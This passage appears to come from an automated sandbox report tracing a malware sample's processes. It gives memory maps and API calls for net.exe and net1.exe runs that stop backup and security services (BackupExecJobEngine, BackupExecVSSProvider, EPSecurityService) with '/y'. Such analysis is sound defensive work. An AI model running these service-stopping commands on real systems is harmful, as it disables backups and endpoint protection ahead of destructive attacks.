0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5254 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5255 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 5256 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 5257 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 5258 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5259 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5260 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5261 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5262 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5263 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5264 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5395 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 507 os_tid = 0x1238 [0090.772] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfe90 | out: lpSystemTimeAsFileTime=0xcfe90*(dwLowDateTime=0xeb4583b0, dwHighDateTime=0x1d48689)) [0090.773] GetCurrentProcessId () returned 0x1234 [0090.773] GetCurrentThreadId () returned 0x1238 [0090.773] GetTickCount () returned 0x20878 [0090.773] QueryPerformanceCounter (in: lpPerformanceCount=0xcfe98 | out: lpPerformanceCount=0xcfe98*=1813769100000) returned 1 [0090.774] GetModuleHandleW (lpModuleName=0x0) returned 0xff9d0000 [0090.774] __set_app_type (_Type=0x1) [0090.774] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff9e9c9c) returned 0x0 [0090.774] __getmainargs (in: _Argc=0xff9f4780, _Argv=0xff9f4790, _Env=0xff9f4788, _DoWildCard=0, _StartInfo=0xff9f479c | out: _Argc=0xff9f4780, _Argv=0xff9f4790, _Env=0xff9f4788) returned 0 [0090.774] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0090.774] GetConsoleOutputCP () returned 0x1b5 [0090.774] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff9fcec0 | out: lpCPInfo=0xff9fcec0) returned 1 [0090.774] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0091.020] sprintf_s (in: _DstBuf=0xcfe38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0091.020] setlocale (category=0, locale=".437") returned="English_United States.437" [0091.021] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.021] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0091.021] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecJobEngine /y" [0091.021] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcfbd0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0091.021] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0091.021] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcfe28 | out: Buffer=0xcfe28*=0x284d60) returned 0x0 [0091.021] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcfe28 | out: Buffer=0xcfe28*=0x28c130) returned 0x0 [0091.021] _fileno (_File=0x7fefdba2a80) returned 0 [0091.021] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0091.022] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0091.022] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0091.022] _wcsicmp (_String1="config", _String2="stop") returned -16 [0091.022] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0091.022] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0091.022] _wcsicmp (_String1="file", _String2="stop") returned -13 [0091.022] _wcsicmp (_String1="files", _String2="stop") returned -13 [0091.022] _wcsicmp (_String1="group", _String2="stop") returned -12 [0091.022] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0091.022] _wcsicmp (_String1="help", _String2="stop") returned -11 [0091.022] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0091.022] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0091.022] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0091.022] _wcsicmp (_String1="session", _String2="stop") returned -15 [0091.022] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0091.022] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0091.022] _wcsicmp (_String1="share", _String2="stop") returned -12 [0091.022] _wcsicmp (_String1="start", _String2="stop") returned -14 [0091.022] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0091.022] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0091.022] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0091.022] _wcsicmp (_String1="accounts", _String2="BackupExecJobEngine") returned -1 [0091.022] _wcsicmp (_String1="computer", _String2="BackupExecJobEngine") returned 1 [0091.022] _wcsicmp (_String1="config", _String2="BackupExecJobEngine") returned 1 [0091.022] _wcsicmp (_String1="continue", _String2="BackupExecJobEngine") returned 1 [0091.022] _wcsicmp (_String1="cont", _String2="BackupExecJobEngine") returned 1 [0091.022] _wcsicmp (_String1="file", _String2="BackupExecJobEngine") returned 4 [0091.022] _wcsicmp (_String1="files", _String2="BackupExecJobEngine") returned 4 [0091.022] _wcsicmp (_String1="group", _String2="BackupExecJobEngine") returned 5 [0091.022] _wcsicmp (_String1="groups", _String2="BackupExecJobEngine") returned 5 [0091.022] _wcsicmp (_String1="help", _String2="BackupExecJobEngine") returned 6 [0091.022] _wcsicmp (_String1="helpmsg", _String2="BackupExecJobEngine") returned 6 [0091.022] _wcsicmp (_String1="localgroup", _String2="BackupExecJobEngine") returned 10 [0091.022] _wcsicmp (_String1="pause", _String2="BackupExecJobEngine") returned 14 [0091.022] _wcsicmp (_String1="session", _String2="BackupExecJobEngine") returned 17 [0091.022] _wcsicmp (_String1="sessions", _String2="BackupExecJobEngine") returned 17 [0091.022] _wcsicmp (_String1="sess", _String2="BackupExecJobEngine") returned 17 [0091.022] _wcsicmp (_String1="share", _String2="BackupExecJobEngine") returned 17 [0091.022] _wcsicmp (_String1="start", _String2="BackupExecJobEngine") returned 17 [0091.022] _wcsicmp (_String1="stats", _String2="BackupExecJobEngine") returned 17 [0091.022] _wcsicmp (_String1="statistics", _String2="BackupExecJobEngine") returned 17 [0091.023] _wcsicmp (_String1="stop", _String2="BackupExecJobEngine") returned 17 [0091.023] _wcsicmp (_String1="time", _String2="BackupExecJobEngine") returned 18 [0091.023] _wcsicmp (_String1="user", _String2="BackupExecJobEngine") returned 19 [0091.023] _wcsicmp (_String1="users", _String2="BackupExecJobEngine") returned 19 [0091.023] _wcsicmp (_String1="msg", _String2="BackupExecJobEngine") returned 11 [0091.023] _wcsicmp (_String1="messenger", _String2="BackupExecJobEngine") returned 11 [0091.023] _wcsicmp (_String1="receiver", _String2="BackupExecJobEngine") returned 16 [0091.023] _wcsicmp (_String1="rcv", _String2="BackupExecJobEngine") returned 16 [0091.023] _wcsicmp (_String1="netpopup", _String2="BackupExecJobEngine") returned 12 [0091.023] _wcsicmp (_String1="redirector", _String2="BackupExecJobEngine") returned 16 [0091.023] _wcsicmp (_String1="redir", _String2="BackupExecJobEngine") returned 16 [0091.023] _wcsicmp (_String1="rdr", _String2="BackupExecJobEngine") returned 16 [0091.023] _wcsicmp (_String1="workstation", _String2="BackupExecJobEngine") returned 21 [0091.023] _wcsicmp (_String1="work", _String2="BackupExecJobEngine") returned 21 [0091.023] _wcsicmp (_String1="wksta", _String2="BackupExecJobEngine") returned 21 [0091.023] _wcsicmp (_String1="prdr", _String2="BackupExecJobEngine") returned 14 [0091.023] _wcsicmp (_String1="devrdr", _String2="BackupExecJobEngine") returned 2 [0091.023] _wcsicmp (_String1="lanmanworkstation", _String2="BackupExecJobEngine") returned 10 [0091.023] _wcsicmp (_String1="server", _String2="BackupExecJobEngine") returned 17 [0091.023] _wcsicmp (_String1="svr", _String2="BackupExecJobEngine") returned 17 [0091.023] _wcsicmp (_String1="srv", _String2="BackupExecJobEngine") returned 17 [0091.023] _wcsicmp (_String1="lanmanserver", _String2="BackupExecJobEngine") returned 10 [0091.023] _wcsicmp (_String1="alerter", _String2="BackupExecJobEngine") returned -1 [0091.023] _wcsicmp (_String1="netlogon", _String2="BackupExecJobEngine") returned 12 [0091.023] _wcsupr (in: _String="BackupExecJobEngine" | out: _String="BACKUPEXECJOBENGINE") returned="BACKUPEXECJOBENGINE" [0091.023] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x28ce40 [0091.026] GetServiceKeyNameW (in: hSCManager=0x28ce40, lpDisplayName="BACKUPEXECJOBENGINE", lpServiceName=0xff9f5750, lpcchBuffer=0xcfd48 | out: lpServiceName="", lpcchBuffer=0xcfd48) returned 0 [0091.027] _wcsicmp (_String1="msg", _String2="BACKUPEXECJOBENGINE") returned 11 [0091.027] _wcsicmp (_String1="messenger", _String2="BACKUPEXECJOBENGINE") returned 11 [0091.027] _wcsicmp (_String1="receiver", _String2="BACKUPEXECJOBENGINE") returned 16 [0091.027] _wcsicmp (_String1="rcv", _String2="BACKUPEXECJOBENGINE") returned 16 [0091.027] _wcsicmp (_String1="redirector", _String2="BACKUPEXECJOBENGINE") returned 16 [0091.027] _wcsicmp (_String1="redir", _String2="BACKUPEXECJOBENGINE") returned 16 [0091.027] _wcsicmp (_String1="rdr", _String2="BACKUPEXECJOBENGINE") returned 16 [0091.027] _wcsicmp (_String1="workstation", _String2="BACKUPEXECJOBENGINE") returned 21 [0091.027] _wcsicmp (_String1="work", _String2="BACKUPEXECJOBENGINE") returned 21 [0091.027] _wcsicmp (_String1="wksta", _String2="BACKUPEXECJOBENGINE") returned 21 [0091.027] _wcsicmp (_String1="prdr", _String2="BACKUPEXECJOBENGINE") returned 14 [0091.027] _wcsicmp (_String1="devrdr", _String2="BACKUPEXECJOBENGINE") returned 2 [0091.027] _wcsicmp (_String1="lanmanworkstation", _String2="BACKUPEXECJOBENGINE") returned 10 [0091.027] _wcsicmp (_String1="server", _String2="BACKUPEXECJOBENGINE") returned 17 [0091.027] _wcsicmp (_String1="svr", _String2="BACKUPEXECJOBENGINE") returned 17 [0091.027] _wcsicmp (_String1="srv", _String2="BACKUPEXECJOBENGINE") returned 17 [0091.028] _wcsicmp (_String1="lanmanserver", _String2="BACKUPEXECJOBENGINE") returned 10 [0091.028] _wcsicmp (_String1="alerter", _String2="BACKUPEXECJOBENGINE") returned -1 [0091.028] _wcsicmp (_String1="netlogon", _String2="BACKUPEXECJOBENGINE") returned 12 [0091.028] NetServiceControl (in: servername=0x0, service="BACKUPEXECJOBENGINE", opcode=0x0, arg=0x0, bufptr=0xcfd50 | out: bufptr=0xcfd50) returned 0x889 [0091.028] wcscpy_s (in: _Destination=0xff9f80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0091.028] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0091.035] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff9f5b50, nSize=0x800, Arguments=0xff9f7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0091.036] GetFileType (hFile=0xb) returned 0x2 [0091.036] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfc18 | out: lpMode=0xcfc18) returned 1 [0091.036] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9f5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xcfc10, lpReserved=0x0 | out: lpBuffer=0xff9f5b50*, lpNumberOfCharsWritten=0xcfc10*=0x1e) returned 1 [0091.037] GetFileType (hFile=0xb) returned 0x2 [0091.037] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfc18 | out: lpMode=0xcfc18) returned 1 [0091.037] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcfc10, lpReserved=0x0 | out: lpBuffer=0xff9d1efc*, lpNumberOfCharsWritten=0xcfc10*=0x2) returned 1 [0091.037] _ultow (in: _Dest=0x889, _Radix=851072 | out: _Dest=0x889) returned="2185" [0091.037] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff9f5b50, nSize=0x800, Arguments=0xff9f7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0091.037] GetFileType (hFile=0xb) returned 0x2 [0091.037] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfc18 | out: lpMode=0xcfc18) returned 1 [0091.038] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9f5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xcfc10, lpReserved=0x0 | out: lpBuffer=0xff9f5b50*, lpNumberOfCharsWritten=0xcfc10*=0x34) returned 1 [0091.038] GetFileType (hFile=0xb) returned 0x2 [0091.038] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfc18 | out: lpMode=0xcfc18) returned 1 [0091.038] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcfc10, lpReserved=0x0 | out: lpBuffer=0xff9d1efc*, lpNumberOfCharsWritten=0xcfc10*=0x2) returned 1 [0091.038] NetApiBufferFree (Buffer=0x284d60) returned 0x0 [0091.039] NetApiBufferFree (Buffer=0x28c130) returned 0x0 [0091.039] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecJobEngine /y" [0091.039] exit (_Code=2) Process: id = "106" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x67675000" os_pid = "0x123c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop EPSecurityService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5265 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5266 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5267 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5268 start_va = 0x170000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 5269 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5270 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5271 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5272 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 5273 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5274 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5275 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 5276 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5277 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 5278 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5279 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 508 os_tid = 0x1240 Process: id = "107" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x66b45000" os_pid = "0x1248" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "101" os_parent_pid = "0x11b8" cmd_line = "C:\\Windows\\system32\\net1 stop BackupExecVSSProvider /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5281 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5282 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5283 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5284 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 5285 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5286 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5287 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5288 start_va = 0xff9d0000 end_va = 0xffa02fff entry_point = 0xff9d0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 5289 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5290 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5291 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 5292 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 5293 start_va = 0x120000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 5294 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5295 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5296 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5297 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5298 start_va = 0x220000 end_va = 0x286fff entry_point = 0x220000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5299 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 5300 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 5301 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5302 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5303 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 5304 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 5305 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 5306 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5307 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5308 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5309 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 5310 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 5311 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 5312 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5313 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5314 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5315 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5316 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5317 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5318 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5411 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 510 os_tid = 0x124c [0090.849] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xefbf0 | out: lpSystemTimeAsFileTime=0xefbf0*(dwLowDateTime=0xeb516a90, dwHighDateTime=0x1d48689)) [0090.849] GetCurrentProcessId () returned 0x1248 [0090.849] GetCurrentThreadId () returned 0x124c [0090.849] GetTickCount () returned 0x208c6 [0090.849] QueryPerformanceCounter (in: lpPerformanceCount=0xefbf8 | out: lpPerformanceCount=0xefbf8*=1813776700000) returned 1 [0090.850] GetModuleHandleW (lpModuleName=0x0) returned 0xff9d0000 [0090.850] __set_app_type (_Type=0x1) [0090.850] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff9e9c9c) returned 0x0 [0090.850] __getmainargs (in: _Argc=0xff9f4780, _Argv=0xff9f4790, _Env=0xff9f4788, _DoWildCard=0, _StartInfo=0xff9f479c | out: _Argc=0xff9f4780, _Argv=0xff9f4790, _Env=0xff9f4788) returned 0 [0090.851] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0090.851] GetConsoleOutputCP () returned 0x1b5 [0090.851] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff9fcec0 | out: lpCPInfo=0xff9fcec0) returned 1 [0090.851] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0090.852] sprintf_s (in: 